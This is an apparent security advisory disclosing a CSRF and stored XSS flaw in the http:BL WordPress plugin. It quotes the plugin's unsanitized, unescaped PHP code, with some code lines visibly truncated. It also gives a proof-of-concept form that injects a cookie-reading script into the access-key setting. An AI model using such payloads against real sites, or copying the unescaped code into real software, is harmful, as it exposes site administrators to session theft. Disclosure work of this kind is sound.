18 Apr

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in http:BL WordPress Plugin

We recently discovered that the http:BL WordPress Plugin has a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability in version 1.9.1, and all prior versions, on the page /wp-admin/plugins.php?page=httpbl%2Fhttpbl.php.

No nonce is included on the page, leading to the CSRF issue.

For the XSS issue, in the file /httpbl.php starting at line 292 settings are saved and there is no sanitization done:

 update_option('httpbl_key', @$_POST["key"] );
 update_option('httpbl_age_thres', @$_POST["age_thres"] );
 @$_POST["threat_thres"] );
 @$_POST["threat_thres_s"] );
 @$_POST["threat_thres_h"] );
 @$_POST["threat_thres_c"] );

 for ($i = 0; pow(2, $i) <= 4; $i++) {
 $value = pow(2, $i);
 $denied[$value] = update_option('httpbl_deny_'.
 $value, (@$_POST["deny_".$value] == 1 ?
 true : false));
 update_option('httpbl_hp', @$_POST["hp"] );
 ( @$_POST["enable_log"] == 1 ? true : false ));
 ( @$_POST["log_blocked_only"] == 1 ?
 true : false ));
 @$_POST["not_logged_ips"] );
 ( @$_POST["enable_stats"] == 1 ? true : false ));
 @$_POST["stats_pattern"] );
 @$_POST["stats_link"] );

When the values are outputted on the page through the file /httpbl.php, they are not escaped. For example, the value for key is set on line 352:

 $key = get_option('httpbl_key');

and outputted on line 401:

 <p>http:BL Access Key <input type='text' name='key' value='<?php echo $key ?>' /> </p>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page. This will occur right after you hit the Submit button when using the Firefox web browser. Other major web browser have XSS filtering, so it will only be shown if you return to /wp-admin/plugins.php?page=httpbl%2Fhttpbl.php after having submitted it.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/plugins.php?page=httpbl%2Fhttpbl.php" method="post">
<input type="hidden" name="key" value="'><script>alert(document.cookie);</script>" />
<input type="submit" name="httpbl_save" value="Submit" />


  • 4/16/2016 – WordPress Plugin Directory notified.

Leave a Reply

Your email address will not be published. Required fields are marked *